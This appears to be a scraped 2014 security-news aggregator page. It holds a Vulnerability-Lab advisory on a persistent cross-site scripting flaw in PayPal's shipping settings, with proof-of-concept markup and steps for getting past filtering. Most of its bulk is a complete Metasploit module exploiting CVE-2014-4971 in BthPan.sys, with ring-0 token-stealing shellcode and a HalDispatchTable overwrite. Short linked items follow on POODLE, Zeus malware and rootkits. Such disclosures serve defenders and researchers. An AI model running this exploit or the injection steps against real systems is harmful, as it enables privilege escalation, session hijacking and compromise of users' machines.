The vulnerability typus allows an attacker to inject own malicious script code in the vulnerable module on application side (persistent).

The vulnerability is located in the `Tools` section of the `Shipping` module when processing to request via POST method manipulated
`ShipFromInfo` values. Remote attackers can inject own persistent script code to execute the context from the ShipFromInfo
parameter in several of the settings listings. The shipping settings redisplays the context of the ShipFromInfo. The parameter
input is not parsed or secure encoded which results in the persistent execution in the next layer of the settings module itself.

The vulnerability is exploitable for stand alone user account but also for multi-accounts in paypal. The way of exploitation is
remote and the risk is high because of the following scenario. A remote attacker is able to inject the information to the profile
itself and can use the details to exchange with the manipulated shippingfrominfo which results also in the persistent execution
of the transaction bound user account (victim|target).

The security risk of the persistent vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1.
Exploitation of the persistent vulnerability requires a low privilege paypal application user account and only low user interaction.
Successful exploitation of the vulnerability result in persistent session hijacking, persistent phishing, persistent external redirects,
persistent external malware loads via inject and persistent module web context manipulation.

Request Method(s):
                        [+] POST

Vulnerable Section(s):
                        [+] Paypal API - (https://www.paypal.com/en)

Vulnerable Module(s):
                        [+] Tools > Shipping

Vulnerable Parameter(s):
                        [+] ShipFromInfo

Affected Module(s):
                        [+] Settings Listing


Proof of Concept (PoC):
=======================
The persistent script code injection web vulnerability can be exploited by remote attackers with a low privileged paypal application user account and
low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.


PoC: Ship From Information

<div style="display: block;" id="ShipToPage" class="SettingsPage">
<h4><em>Ship From Information:</em></h4>
<table style="margin-left: 10px" cellpadding="2" cellspacing="0">
<tbody><tr>
<td colspan="2" id="ShipFromInfo" style="font-weight: bold">">""<[PERSISTENT INJECTED SCRIPT CODE!]
/>>"<[2nd PERSISTENT INJECTED SCRIPT CODE!]><br>5305352131</td>
</tr>
</tbody></table>


Manually Exploitation steps to reproduce ...

1.  Register 2 verified or unverified paypal accounts
2.  Login to the first account and go to the shipping information in the tools section
3.  Open another window and switch to the profile settings were you include the shipping from information
4.  Include the payload from the poc section to bypass the filter validation of the api
Recognize: Include the payload two times and split the both tags with 2 times %20!
5.  Switch back to the first page in the tools section under shipping
6.  Open the seperate edit setting button from the index listing
7.  Go to the first menu point Ship From Information
8.  On top of the listing the persistent injected script code from the main section will be executed within the context
9.  #1 Successful reproduced ...! (Local)
10. Buy or sell an article to a customer and use the shipping from information details as location
11. After the buyer or seller get the information of the used shiping details he can review the details ShipFromInfo
12. The persistent script code will be executed in the web context of the vulnerable module settings in the shipping details
13. #2 Successful reproduced ...! (Remote)


Reference(s):
https://ship.paypal.com/cgi-bin/shipweb?cmd=add-shipping-preset
https://ship.paypal.com/powership/shipping/js/requests/create-shipments-from-file.js?version=1_0_4


Solution - Fix & Patch:
=======================
Parse the output listing page of the settings website to patch the issue.
Encode and filter he ShipFromInfo parameter POST method request to fix the vulnerability and to prevent persistent script code injection attacks.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shipping application of paypal inc is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Metasploit: Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation

October 15, 2014, 2:24 am
$
0
0
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::FileInfo
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
      'Description'    => %q{
        A vulnerability within Microsoft Bluetooth Personal Area Networking module,
        BthPan.sys, can allow an attacker to inject memory controlled by the attacker
        into an arbitrary location. This can be used by an attacker to overwrite
        HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
        NtQueryIntervalProfile.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
        ],
      'Arch'          => ARCH_X86,
      'Platform'      => 'win',
      'SessionTypes'  => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Targets'       =>
        [
          ['Windows XP SP3',
           {
             'HaliQuerySystemInfo' => 0x16bba,
             '_KPROCESS'  => "\x44",
             '_TOKEN'     => "\xc8",
             '_UPID'      => "\x84",
             '_APLINKS'   => "\x88"
           }
          ]
        ],
      'References'    =>
        [
          [ 'CVE', '2014-4971' ],
          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ],
          [ 'OSVDB', '109387' ]
        ],
      'DisclosureDate' => 'Jul 18 2014',
      'DefaultTarget'  => 0
    ))
  end


  def ring0_shellcode
    tokenswap = "\x60\x64\xA1\x24\x01\x00\x00"
    tokenswap << "\x8B\x40\x44\x50\xBB\x04"
    tokenswap << "\x00\x00\x00\x8B\x80\x88"
    tokenswap << "\x00\x00\x00\x2D\x88"
    tokenswap << "\x00\x00\x00\x39\x98\x84"
    tokenswap << "\x00\x00\x00\x75\xED\x8B\xB8\xC8"
    tokenswap << "\x00\x00\x00\x83\xE7\xF8\x58\xBB"
    tokenswap << [session.sys.process.getpid].pack('V')
    tokenswap << "\x8B\x80\x88\x00\x00\x00"
    tokenswap << "\x2D\x88\x00\x00\x00"
    tokenswap << "\x39\x98\x84\x00\x00\x00"
    tokenswap << "\x75\xED\x89\xB8\xC8"
    tokenswap << "\x00\x00\x00\x61\xC3"
  end

  def fill_memory(proc, address, length, content)
    session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")

    unless proc.memory.writable?(address)
      vprint_error("Failed to allocate memory")
      return nil
    end
    vprint_good("#{address} is now writable")

    result = proc.memory.write(address, content)

    if result.nil?
      vprint_error("Failed to write contents to memory")
      return nil
    end
    vprint_good("Contents successfully written to 0x#{address.to_s(16)}")

    return address
  end

  def disclose_addresses(t)
    addresses = {}

    hal_dispatch_table = find_haldispatchtable
    return nil if hal_dispatch_table.nil?
    addresses['halDispatchTable'] = hal_dispatch_table
    vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")

    vprint_status('Getting the hal.dll base address...')
    hal_info = find_sys_base('hal.dll')
    if hal_info.nil?
      vprint_error('Failed to disclose hal.dll base address')
      return nil
    end
    hal_base = hal_info[0]
    vprint_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16)}")

    hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
    addresses['HaliQuerySystemInfo'] = hali_query_system_information

    vprint_good("HaliQuerySystemInfo address disclosed at 0x#{addresses['HaliQuerySystemInfo'].to_s(16)}")
    addresses
  end

  def check
    if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
      return Exploit::CheckCode::Safe
    end

    os = sysinfo["OS"]
    return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    return Exploit::CheckCode::Safe unless handle

    session.railgun.kernel32.CloseHandle(handle)

    return Exploit::CheckCode::Vulnerable
  end

  def exploit
    if is_system?
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

    unless check == Exploit::CheckCode::Vulnerable
      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
    end

    handle = open_device("\\\\.\\bthpan", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      fail_with(Failure::NoTarget, "Unable to open \\\\.\\bthpan device")
    end

    my_target = targets[0]
    print_status("Disclosing the HalDispatchTable address...")
    @addresses = disclose_addresses(my_target)
    if @addresses.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Failed to disclose necessary address for exploitation. Aborting.")
    else
      print_good("Address successfully disclosed.")
    end

    print_status("Storing the shellcode in memory...")
    this_proc = session.sys.process.open
    kernel_shell = ring0_shellcode
    kernel_shell_address = 0x1

    buf = "\x90" * 0x6000
    buf[0, 1028] = "\x50\x00\x00\x00" + "\x90" * 0x400
    buf[0x5000, kernel_shell.length] = kernel_shell

    result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
    if result.nil?
      session.railgun.kernel32.CloseHandle(handle)
      fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
    end
    print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")

    print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
    session.railgun.kernel32.CloseHandle(handle)

    print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
    session.railgun.ntdll.NtQueryIntervalProfile(2, 4)

    print_status("Checking privileges after exploitation...")

    unless is_system?
      fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
    end
    print_good("Privilege escalation successful!")

    p = payload.encoded
    print_status("Injecting #{p.length} bytes to memory and executing it...")
    unless execute_shellcode(p)
      fail_with(Failure::Unknown, "Error while executing the payload")
    end
  end
end



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Search

Gameover Zeus Accessorizes at Vogue.com

October 15, 2014, 2:31 am
$
0
0
Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp://media.vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe

more here.........http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/

Attack of the week: POODLE

October 15, 2014, 2:33 am
$
0
0
Believe it or not, there's a new attack on SSL. Yes, I know you're thunderstruck. Let's get a few things out of the way quickly.

First, this is not another Heartbleed. It's bad, but it's not going to destroy the Internet. Also, it applies only to SSLv3, which is (in theory) an obsolete protocol that we all should have ditched a long time ago. Unfortunately, we didn't.

Anyway, enough with the good news. Let's get to the bad.

more here..........http://blog.cryptographyengineering.com/2014/10/attack-of-week-poodle.html

Gmail’s SMTPUTF8 prone to homographic attacks (thanks, 4chan!)

October 15, 2014, 2:41 am
$
0
0
I always loved working with Google.

I have been participating in their program since 2012. Over the years, I addressed some nice vulnerabilities that got me a couple of hall of fame entries and of course some nice monetary awards. But this last time, I drew a blank.

more here............http://ceukelai.re/?p=11

POODLE attacks on SSLv3

October 15, 2014, 2:44 am
$
0
0
My colleague, Bodo Möller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn't require such extensive control of the format of the plaintext and thus is more practical.

more here..........https://www.imperialviolet.org/2014/10/14/poodle.html

Userland rootkits: Part 1, IAT hooks

October 15, 2014, 3:21 am
$
0
0
This is the first part of this series about Userland rootkits, I wanted to write on it and demonstrate how some rootkits do to hide files by using IAT hooks.

This post is about a classic trick, known for decades. Malware specialists may know this already, so this is mostly an introduction for whom willing to learn the theory of rootkits, and have a demonstration.

more here...............http://www.adlice.com/userland-rootkits-part-1-iat-hooks/
Viewing all 8064 articles
Browse latest View live
Search